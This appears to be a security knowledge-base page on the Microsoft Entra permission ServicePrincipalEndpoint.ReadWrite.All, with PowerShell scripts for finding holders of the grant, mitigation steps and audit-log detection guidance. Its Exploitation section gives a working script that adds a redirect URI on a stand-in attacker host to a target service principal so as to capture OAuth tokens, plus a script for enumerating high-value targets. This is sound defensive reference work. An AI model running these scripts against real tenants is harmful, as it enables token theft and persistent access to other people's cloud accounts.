AZ_MG_SERVICEPRINCIPALENDPOINT_READWRITE_ALL

Summary

FSProtect ACL Alias

Entra ID (Azure AD) Alias

ServicePrincipalEndpoint.ReadWrite.All

Affected Object Types

Service Principals, Applications

Exploitation Certainty

Certain

Graph Permission / Role

Application Permission: ServicePrincipalEndpoint.ReadWrite.All

Description

AZ_MG_SERVICEPRINCIPALENDPOINT_READWRITE_ALL represents a Microsoft Graph application permission that grants the ability to read and write service principal endpoints in Microsoft Entra ID (Azure AD).

Service principal endpoints define the URLs and configurations that applications use for authentication, token redemption, and other OAuth/OIDC operations. This permission allows:

Read all service principal endpoint configurations
Modify endpoint URLs including reply URLs and redirect URIs
Add new endpoints to existing service principals
Delete or modify authentication endpoints

Security Implications:

This permission is dangerous because an attacker can:

Redirect authentication flows: Modify redirect URIs to capture OAuth tokens and authorization codes.
Man-in-the-middle attacks: Inject attacker-controlled endpoints to intercept authentication traffic.
Token theft: Add malicious reply URLs to steal access tokens during OAuth flows.
Persistence: Add backdoor endpoints that remain even after credentials are rotated.

Important: This is an application permission that requires admin consent. It operates at the tenant level, affecting all service principals.

Identification

PowerShell

Find Service Principals with ServicePrincipalEndpoint.ReadWrite.All

Find-ServicePrincipals-With-Permission.ps1

Connect-AzAccount

$permissionId = "89c8469c-83ad-45f7-8ff2-6e3d4285709b"  # ServicePrincipalEndpoint.ReadWrite.All GUID

# Get all service principals with app role assignments
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$expand=appRoleAssignments"
$allServicePrincipals = @()

while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    $allServicePrincipals += $data.value
    $uri = $data.'@odata.nextLink'
}

Write-Host "Retrieved $($allServicePrincipals.Count) service principals"

# Filter for ServicePrincipalEndpoint.ReadWrite.All
$results = @()

foreach ($sp in $allServicePrincipals) {
    $matchingAssignments = $sp.appRoleAssignments | Where-Object { $_.appRoleId -eq $permissionId }
    
    foreach ($assignment in $matchingAssignments) {
        $results += [PSCustomObject]@{
            ServicePrincipalName = $sp.displayName
            ServicePrincipalId   = $sp.id
            AppId                = $sp.appId
            PermissionName       = "ServicePrincipalEndpoint.ReadWrite.All"
            PermissionId         = $permissionId
            ResourceId           = $assignment.resourceId
            AssignedDateTime     = $assignment.createdDateTime
        }
    }
}

Write-Host "`nFound $($results.Count) service principals with ServicePrincipalEndpoint.ReadWrite.All"
$results | Export-Csv -Path ".\ServicePrincipalEndpoint_ReadWriteAll.csv" -NoTypeInformation -Encoding UTF8
$results | Format-Table -AutoSize

List All Service Principal Endpoints

List-ServicePrincipal-Endpoints.ps1

# Enumerate endpoints for all service principals
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$select=id,displayName,appId,replyUrls,servicePrincipalType"
$allSPs = @()

while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    $allSPs += $data.value
    $uri = $data.'@odata.nextLink'
}

$endpointResults = @()
foreach ($sp in $allSPs) {
    foreach ($url in $sp.replyUrls) {
        $endpointResults += [PSCustomObject]@{
            ServicePrincipalName = $sp.displayName
            ServicePrincipalId   = $sp.id
            AppId                = $sp.appId
            ReplyUrl             = $url
            Type                 = $sp.servicePrincipalType
        }
    }
}

$endpointResults | Export-Csv -Path ".\ServicePrincipal_Endpoints.csv" -NoTypeInformation -Encoding UTF8
$endpointResults | Format-Table -AutoSize

Exploitation

An attacker with ServicePrincipalEndpoint.ReadWrite.All can modify service principal endpoints to intercept authentication flows.

Add Malicious Redirect URI to Capture Tokens

Add-Malicious-RedirectURI.ps1

# Authenticate as the compromised service principal
$tenantId = "<tenant-id>"
$appId = "<compromised-app-id>"
$clientSecret = "<client-secret>"

$secureSecret = ConvertTo-SecureString $clientSecret -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential($appId, $secureSecret)
Connect-AzAccount -ServicePrincipal -Credential $credential -Tenant $tenantId

# Target a high-value service principal
$targetSpId = "<target-service-principal-id>"

# Get current configuration
$getUri = "https://graph.microsoft.com/v1.0/servicePrincipals/$targetSpId"
$response = Invoke-AzRestMethod -Uri $getUri -Method GET
$sp = $response.Content | ConvertFrom-Json

Write-Output "Current reply URLs:"
$sp.replyUrls

# Add a malicious redirect URI
$attackerUrl = "https://attacker-controlled-server.com/callback"
$newReplyUrls = $sp.replyUrls + $attackerUrl

$updateUri = "https://graph.microsoft.com/v1.0/servicePrincipals/$targetSpId"
$body = @{
    replyUrls = $newReplyUrls
} | ConvertTo-Json

$updateResponse = Invoke-AzRestMethod -Uri $updateUri -Method PATCH -Payload $body

if ($updateResponse.StatusCode -eq 204) {
    Write-Output "Successfully added malicious redirect URI: $attackerUrl"
} else {
    Write-Output "Failed: $($updateResponse.Content)"
}

Enumerate High-Value Targets

Enumerate-HighValue-Targets.ps1

# Find service principals with sensitive permissions that could be targeted
$uri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$expand=appRoleAssignments&`$select=id,displayName,appId,replyUrls"
$allSPs = @()

while ($uri) {
    $response = Invoke-AzRestMethod -Uri $uri -Method GET
    $data = $response.Content | ConvertFrom-Json
    $allSPs += $data.value
    $uri = $data.'@odata.nextLink'
}

# Find SPs with Graph permissions (potential high-value targets)
$highValueTargets = $allSPs | Where-Object { $_.appRoleAssignments.Count -gt 0 }

$highValueTargets | ForEach-Object {
    Write-Output "SP: $($_.displayName) | Permissions: $($_.appRoleAssignments.Count) | Reply URLs: $($_.replyUrls.Count)"
}

Mitigation

Audit all service principals with ServicePrincipalEndpoint.ReadWrite.All and remove unnecessary grants.
- Go to Microsoft Entra ID -> App registrations -> select application -> API permissions.
- Remove the ServicePrincipalEndpoint.ReadWrite.All permission if not required.
Monitor redirect URI changes on service principals:
- Review audit logs for modifications to service principal configurations.
- Alert on unexpected reply URL additions.
Implement strict reply URL policies:
- Use exact match redirect URIs instead of wildcards.
- Limit reply URLs to known, trusted domains.
Use Application.Read.All instead if only read access is needed.
Regular endpoint audits: Periodically review all service principal endpoints for unauthorized additions.

Detection

Detect endpoint modifications in Audit logs.

Go to Microsoft Entra ID -> Audit logs.
Filter by activities:
- Update service principal
- Update application

Monitor for:

Reply URL additions to service principals.
Endpoint changes outside of change management windows.
Addition of external or suspicious domains to redirect URIs.
Bulk endpoint modifications across multiple service principals.

References

https://learn.microsoft.com/en-us/graph/api/resources/serviceprincipal
https://learn.microsoft.com/en-us/graph/permissions-reference
https://learn.microsoft.com/en-us/azure/active-directory/develop/reply-url
https://learn.microsoft.com/en-us/entra/workload-id/workload-identities-overview

PreviousAZ_MG_ROLEMANAGEMENT_READWRITE_DIRECTORY NextAZ_OWNER

Last updated 6 days ago

Was this helpful?

hashtagSummary

hashtagDescription

hashtagIdentification

hashtagPowerShell

hashtagFind Service Principals with ServicePrincipalEndpoint.ReadWrite.All

hashtagList All Service Principal Endpoints

hashtagExploitation

hashtagAdd Malicious Redirect URI to Capture Tokens

hashtagEnumerate High-Value Targets

hashtagMitigation

hashtagDetection

hashtagReferences